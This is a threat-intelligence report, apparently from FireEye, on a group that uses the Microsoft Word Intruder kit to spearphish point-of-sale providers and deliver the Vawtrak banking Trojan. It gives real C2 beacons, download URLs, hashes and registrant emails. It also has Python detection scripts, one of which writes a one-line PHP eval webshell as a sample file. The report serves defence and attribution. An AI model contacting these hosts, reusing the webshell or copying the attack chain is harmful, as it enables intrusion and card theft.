Targeted Crimeware in the Midst of Indiscriminate Activity

Observers often depict cybercriminals’ attacks as indiscriminate, such as a spam campaign directed at thousands of people. That activity contrasts with the tactics of APT groups, who typically direct spearphishing at a specific individual, company or industry vertical and leverage exploits, sometimes zero-day exploits, to achieve their objectives. However, FireEye’s research published in April 2015 on a new document exploit kit, Microsoft Word Intruder (MWI), revealed that cybercriminals can purchase tools to conduct targeted intrusions. In fact, the distributor of MWI, who is also its author, markets the exploit kit as an “APT” tool, capable of directing an attack at a specific individual or firm, and has warned customers that he will revoke the license of anyone caught using the tool for spam.

Although we have observed low-volume spam campaigns by some cybercriminals who have purchased MWI, we recently discovered spearphishing emails from one group using MWI to attack point-of-sale (POS) service providers. Despite the targeted nature of the spearphishing emails, the payload was the widely distributed Vawtrak banking Trojan. In addition, we found that the infrastructure used in this case overlaps with FindPOS/PoSeidon as well as Chanitor, and sits amidst a cluster of largely indiscriminate malicious activity.

This group’s use of MWI suggests that some cybercriminals have likely added targeted intrusions to their tactics. Vawtrak may seem like an odd choice of payload for a targeted intrusion, because cybercriminals typically distribute Vawtrak through spam, exploit kits (such as Angler), and downloaders (such as Chanitor, which reaches Tor hidden services through tor2web gateways). However, a widely distributed tool like Vawtrak can be used to sift through compromised systems and identify specific victims for further exploitation. Below, we discuss how this activity, together with POS-specific malware, indicates that cybercriminals may use Vawtrak to identify potential POS systems among the botnet’s already compromised victims.

Targeting POS Providers

To target a specific POS provider, a cybercriminal group registered a domain name, [redacted].net, and sent a spearphishing email from this domain to impersonate an actual restaurant in New York City.

The email contains an attachment, “[redacted]_bus_card.doc” (6adb338e08bcead42cd51f0b5b573a58), which is a malicious document built with the MWI document exploit kit. When opened, the document beacons to an MWISTAT server at 91.220.131.245 to download a malware payload:

GET /joomla/image.php?id=90440600 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET4.0C; .NET4.0E; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: 91.220.131.245
Connection: Keep-Alive

The payload served by MWISTAT has the ID 90440600. MWISTAT generates this unique ID so that the threat group can track the progression of a particular campaign. The payload (f4d48337c38988acc43b64ee180fa8a0) is Vawtrak, a banking Trojan that not only includes a web-injects framework but can also steal passwords and digital certificates, log keystrokes, take screenshots and enable VNC so that the threat actors can interact with the victim through a remote desktop session.

In this case, Vawtrak connected to a C2 server at winfertrow[.]com (162.247.15.60):

POST /stats/00/counter/00000070/[redacted] HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET4.0C; .NET4.0E)
Host: winfertrow.com
Content-Length: 251

The beacon contains a PROJECT_ID value (00000070) that the C2 uses to determine which configuration file to send to the victim. In this case, the configuration file that was sent contains webinjects that allow the cybercriminals to steal credentials for a number of banks globally as well as for popular online services.

The reply from the C2 also instructed the compromised computer to download an update from hxxp://pickleweb[.]net/upd/112?id=[redacted]&o=1&n=4 (pickleweb[.]net did not resolve at the time of our analysis) and to open a connection to 91.220.131.66 on port 8080.
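Both check-ins above have a shape a network monitor can key on: the MWISTAT request is a GET to image.php with an 8-digit campaign ID, sent from the Office process (hence the "MSOffice" token in the User-Agent), and the Vawtrak request is a POST to /stats/NN/counter/<PROJECT_ID>/<bot id>. The following Python is an added example, not code from the original post, that picks both shapes out of proxy-style log lines and extracts the campaign ID and PROJECT_ID for pivoting. The log layout and the sample lines are constructed here; the two ambiguous lines show why the User-Agent token matters.

```python
import re

# Constructed proxy-style log lines: <client> <method> <host> <path> "<user-agent>".
# They are not real logs; they reproduce the two request shapes from the post plus
# two benign/ambiguous lines to exercise the checks.
SAMPLE_LOG = [
    '10.1.2.3 GET 91.220.131.245 /joomla/image.php?id=90440600 '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; MSOffice 12)"',
    '10.1.2.3 POST winfertrow.com /stats/00/counter/00000070/a1b2c3 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"',
    '10.1.2.4 GET www.example.com /joomla/image.php?id=5 '
    '"Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"',
    '10.1.2.5 GET 91.220.131.243 /dermo/image.php?id=94970298 '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; MSOffice 14)"',
    '10.1.2.6 GET cdn.example.net /img/image.php?id=12345678 '
    '"Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$')

# MWISTAT check-in: GET /<dir>/image.php?id=<8-digit campaign ID>. The request is made
# from inside the Office process, so its User-Agent carries an "MSOffice <ver>" token.
MWI_RE = re.compile(r'^/[^/?]+/image\.php\?id=(?P<id>\d{8})$')
# Vawtrak check-in: POST /stats/<2 digits>/counter/<8-digit PROJECT_ID>/<bot identifier>
VAWTRAK_RE = re.compile(r'^/stats/\d{2}/counter/(?P<project>\d{8})/[^/]+$')


def classify(line):
    """Return a hit dict for an MWI or Vawtrak check-in, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    mwi = MWI_RE.match(f["path"])
    if f["method"] == "GET" and mwi:
        # An 8-digit id on image.php alone is only suggestive; the MSOffice token
        # is what ties the request to a document being opened.
        return {"family": "MWI", "client": f["client"], "host": f["host"],
                "campaign_id": mwi.group("id"),
                "confidence": "high" if "MSOffice" in f["ua"] else "medium"}
    vaw = VAWTRAK_RE.match(f["path"])
    if f["method"] == "POST" and vaw:
        return {"family": "Vawtrak", "client": f["client"], "host": f["host"],
                "project_id": vaw.group("project"), "confidence": "high"}
    return None


def scan(lines):
    """Run classify() over every line and keep the hits in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The campaign ID and PROJECT_ID are worth logging as fields rather than just alerting on: the same ID across several clients means one lure reached several people, which is exactly the kind of targeting signal this post describes.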

In total we found three malicious MWI documents that connect to the MWISTAT server at 91.220.131.245 and 91.220.131.243 (both IP addresses point to the same server); both of the payloads we were able to download are Vawtrak.

  • [redacted]_bus_card.doc (6adb338e08bcead42cd51f0b5b573a58)
    • hxxp://91.220.131.245/joomla/image.php?id=90440600
      • 90440600 (f4d48337c38988acc43b64ee180fa8a0)
  • [redacted]_crash_log.doc (eccc3e3c3c9e863aaf31ec0e2825e820)
    • hxxp://91.220.131.245/joomla/image.php?id=48436619
      • 48436619 (unable to retrieve payload)
  • pos_list.doc (ac0b1712af0b1a41c6bd216d782022a4)
    • hxxp://91.220.131.243/dermo/image.php?id=94970298
      • 94970298 (cd128a85e0c89cf09cf31b85812a149e)

Each malicious document is configured to connect to the same MWISTAT server but with a different ID, so that the cybercriminal group can track the effectiveness of each campaign. For each ID, the group can view the IP address and geographic location of every target that opened the document, as well as whether the payload was successfully delivered to the victim.

Webshells and Mailers

On the same server (91.220.131.245/91.220.131.243) we found a tool the cybercriminal group used to check and access compromised web servers on which a webshell had been placed, in order to upload a mailing script.

The tool looked for webshells named either “i.php” or “cached_data.php” and used them to upload PHPMailer to “phpm3.php”.

This mailer can then be used to send spam or spearphishing emails from the servers of compromised third parties.
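From the defender's side, the artifacts this tool relies on are the file names it looks for and the one it writes. The Python below is an added example, not a tool from the post, that hunts a web root for those names and for a PHPMailer class dropped outside the usual vendor path, reporting the MD5 of each hit for comparison with known-good copies. The sample web root is constructed inside a temporary directory, and the assumption that legitimate PHPMailer copies live under vendor/ is ours.

```python
import hashlib
import os
import tempfile

# File names the MWI server-side tool looked for (webshells) and wrote (PHPMailer drop).
SUSPECT_NAMES = {
    "i.php": "webshell name checked by the tool",
    "cached_data.php": "webshell name checked by the tool",
    "phpm3.php": "file the tool uploads PHPMailer to",
}
# Assumption: a legitimate PHPMailer copy lives under a vendor/ directory; the class
# name appearing in a PHP file anywhere else is worth a look.
MAILER_MARKER = b"class PHPMailer"
TRUSTED_DIRS = {"vendor"}


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(webroot):
    """Walk a web root and return [{path, reason, md5}] for every suspicious PHP file."""
    hits = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            reason = SUSPECT_NAMES.get(name)
            in_trusted = bool(set(rel.split("/")[:-1]) & TRUSTED_DIRS)
            if reason is None and name.endswith(".php") and not in_trusted:
                with open(full, "rb") as fh:
                    if MAILER_MARKER in fh.read():
                        reason = "PHPMailer class outside vendor/"
            if reason:
                hits.append({"path": rel, "reason": reason, "md5": md5_of(full)})
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree(root):
    """Lay out a constructed web root: a benign site plus the artifacts described above."""
    files = {
        "index.php": b"<?php echo 'hello'; ?>",
        "uploads/i.php": b"<?php eval($_POST['c']); ?>",            # webshell
        "cache/cached_data.php": b"<?php eval($_REQUEST['x']); ?>",  # webshell
        "phpm3.php": b"<?php class PHPMailer { /* ... */ } ?>",       # uploaded mailer
        "mail/sendit.php": b"<?php class PHPMailer { } ?>",           # mailer copied elsewhere
        "vendor/phpmailer/class.phpmailer.php": b"<?php class PHPMailer { } ?>",  # legitimate
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root


def demo():
    """Build the sample tree in a temporary directory and hunt it."""
    with tempfile.TemporaryDirectory() as tmp:
        return hunt(build_sample_tree(tmp))


if __name__ == "__main__":
    for hit in demo():
        print(f'{hit["md5"]}  {hit["path"]}  ({hit["reason"]})')
```

Name-based checks are cheap but brittle, since the operator can rename the shell; the content check on the mailer class is the part that survives a rename, and on a real server it should be paired with a look at the web server's access log for POST requests to whatever file turned up.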

A Bad Neighborhood: 91.220.131.0/24

The 91.220.131.0/24 IP address range is assigned to a hosting provider in Russia and is a hotspot for malicious activity. Not all of the activity found within this class-C subnet is necessarily directly linked; the range may belong to a provider that simply rents servers to a variety of cybercriminals. However, there are significant overlaps between the spearphishing campaigns we observed, the Vawtrak payload, and the FindPOS/PoSeidon malware that enables cybercriminals to extract payment card information from POS terminals. The same class-C subnet also hosts two “carder” shops that sell stolen payment card information.

The MWI/Vawtrak – FindPOS/PoSeidon Connection

The domain used to send the spearphishing email in this case, [redacted].net, was registered with an email address that was also used to register a number of domains serving as C2s for FindPOS/PoSeidon. In addition, we observed another FindPOS C2, registered with a different email address, resolve to an IP address in the same class C as the MWISTAT server in this case. That second email address was also used to register domain names used as Vawtrak C2s.

Domain               Registrant email           Resolved IP       Use
[redacted].net       sillitoexpya@rambler.ru    31.184.192.215    Spearphish sender
xablopefgr[.]com     sillitoexpya@rambler.ru    91.220.131.87     FindPOS/PoSeidon C2
repherfeted[.]com    barkmanueta@rambler.ru     91.220.131.108    FindPOS/PoSeidon C2
idthentehed[.]com    barkmanueta@rambler.ru     -                 Vawtrak C2
rebteugrigh[.]com    barkmanueta@rambler.ru     -                 Vawtrak C2
othersforrep[.]com   barkmanueta@rambler.ru     -                 Vawtrak C2
cakedhisjohn[.]com   barkmanueta@rambler.ru     -                 Vawtrak C2
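The chain of reasoning in this section is a graph problem: domains are linked when they share a registrant email, and, more weakly, when they resolve into the same /24. The Python below is an added example, not analysis code from the post, that runs that pivot over the table above with a union-find and shows how the spearphish domain, the FindPOS/PoSeidon C2s, the Vawtrak C2s and the MWISTAT server fall into a single cluster. The MWISTAT row and the "constructed control" row are added here for illustration; the control domain is fictional. The link_subnets switch reflects the caveat above that the /24 is rented to many actors: turn it off and the shared-registrant links alone no longer bridge the two registrant groups.

```python
import ipaddress
from collections import defaultdict

# Built from the registrant/IP table in this post (defanged names kept as-is). The
# "mwistat" row is the MWISTAT server from earlier in the post; the last row is a
# constructed control that must not join the cluster.
INDICATORS = [
    {"name": "[redacted].net",     "registrant": "sillitoexpya@rambler.ru", "ip": "31.184.192.215", "role": "spearphish sender"},
    {"name": "xablopefgr[.]com",   "registrant": "sillitoexpya@rambler.ru", "ip": "91.220.131.87",  "role": "FindPOS/PoSeidon C2"},
    {"name": "repherfeted[.]com",  "registrant": "barkmanueta@rambler.ru",  "ip": "91.220.131.108", "role": "FindPOS/PoSeidon C2"},
    {"name": "idthentehed[.]com",  "registrant": "barkmanueta@rambler.ru",  "ip": None,             "role": "Vawtrak C2"},
    {"name": "rebteugrigh[.]com",  "registrant": "barkmanueta@rambler.ru",  "ip": None,             "role": "Vawtrak C2"},
    {"name": "othersforrep[.]com", "registrant": "barkmanueta@rambler.ru",  "ip": None,             "role": "Vawtrak C2"},
    {"name": "cakedhisjohn[.]com", "registrant": "barkmanueta@rambler.ru",  "ip": None,             "role": "Vawtrak C2"},
    {"name": "mwistat",            "registrant": None,                      "ip": "91.220.131.245", "role": "MWISTAT server"},
    {"name": "unrelated.example",  "registrant": "nobody@example.com",      "ip": "198.51.100.7",   "role": "constructed control"},
]


class DisjointSet:
    """Minimal union-find with path halving."""

    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def cluster(indicators, link_subnets=True):
    """Group indicators that share a registrant email or (optionally) a /24.

    Returns a list of clusters (each a sorted list of names), largest first.
    """
    names = [i["name"] for i in indicators]
    ds = DisjointSet(names)
    by_registrant = defaultdict(list)
    by_subnet = defaultdict(list)
    for i in indicators:
        if i["registrant"]:
            by_registrant[i["registrant"]].append(i["name"])
        if i["ip"] and link_subnets:
            # strict=False lets ip_network() mask the host bits for us.
            net = ipaddress.ip_network(f'{i["ip"]}/24', strict=False)
            by_subnet[net].append(i["name"])
    for group in list(by_registrant.values()) + list(by_subnet.values()):
        for other in group[1:]:
            ds.union(group[0], other)
    groups = defaultdict(list)
    for n in names:
        groups[ds.find(n)].append(n)
    return sorted((sorted(g) for g in groups.values()), key=len, reverse=True)


if __name__ == "__main__":
    for flag in (True, False):
        print(f"link_subnets={flag}:")
        for c in cluster(INDICATORS, link_subnets=flag):
            print("  ", c)
```

With subnet links on, one cluster holds everything except the control; with them off, the spearphish/FindPOS pair, the second registrant's FindPOS and Vawtrak domains, and the MWISTAT server become three separate clusters. That is the honest reading of the evidence here: the registrant overlaps are strong links, and the shared /24 is what joins them.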

Vawtrak/Chanitor Hosting

We also observed a Vawtrak sample hosted at hxxp://91.220.131.29/upd/install.exe (f06bef376ca88e1e4afe8716f20590cf).

This class-C subnet also acts as a host for a number of Chanitor download sites. Typically, Chanitor is propagated by spam emails with document attachments that use malicious macros to download a payload.

IP               Path                MD5
91.220.131.44    /upd/install.exe    b5a8116690a7bdf074db9329b23678b2
91.220.131.146   /upd3/install.exe   a74fcd114f1e6df76ce04a0975523cc7
91.220.131.114   /upd/install.exe    17f4394a5540e69a79b3c8cff3e1f225
91.220.131.49    /ant/file.exe       cbe589381dddacb1065cedd0a0094326
91.220.131.69    /ca/file.exe        4b78c2ab3629e51d8a6c8ffa4410b3f7
91.220.131.63    /ca/file.exe        4b78c2ab3629e51d8a6c8ffa4410b3f7
91.220.131.73    /ca/file.pif        6d35acab684d45d8a80c6201d060e6fa
91.220.131.38    /upd3/install.exe   2f108e18177dd7a6ae7e413e9153337d
91.220.131.28    /upd2/install.exe   dc7740f2ac76b8c5dccf686ad5fd0c05
91.220.131.40    /upd/install.exe    cb9749ce4cd28eb73bf9a6bedd2f0c5a

“Carder” Shops

In addition, we found that two “carder” shops that specialize in selling stolen credit cards are also located in this class-C subnet.

Both justbuy[.]cc and jworldtopcc[.]su sit behind CloudFlare; however, their origin IP addresses are 91.220.131.242 and 91.220.131.84 respectively. Both shops appear to be stocked with newly stolen cards on a regular basis.

Conclusion

Cybercriminals engage in both indiscriminate campaigns and targeted intrusions. Moreover, they may use their typical indiscriminate campaigns to scout for interesting victims, who have already been compromised, and then further target specific individuals, companies, or industry verticals. Combining a targeted intrusion with a widely deployed payload can make it difficult for network security monitors to assess the level of risk associated with an alert.

In addition to having access to multipurpose malware, such as Vawtrak, cybercriminals can also deploy additional malware, such as FindPOS, that specifically enables them to extract payment card information from POS terminals.

Network defenders of the common targets for cybercriminals—especially in retail and finance—should be aware that cybercriminals’ initial intrusion might only be the start of a deeper operation. Defenders should consider how these groups could use existing footholds to further exploit already compromised systems.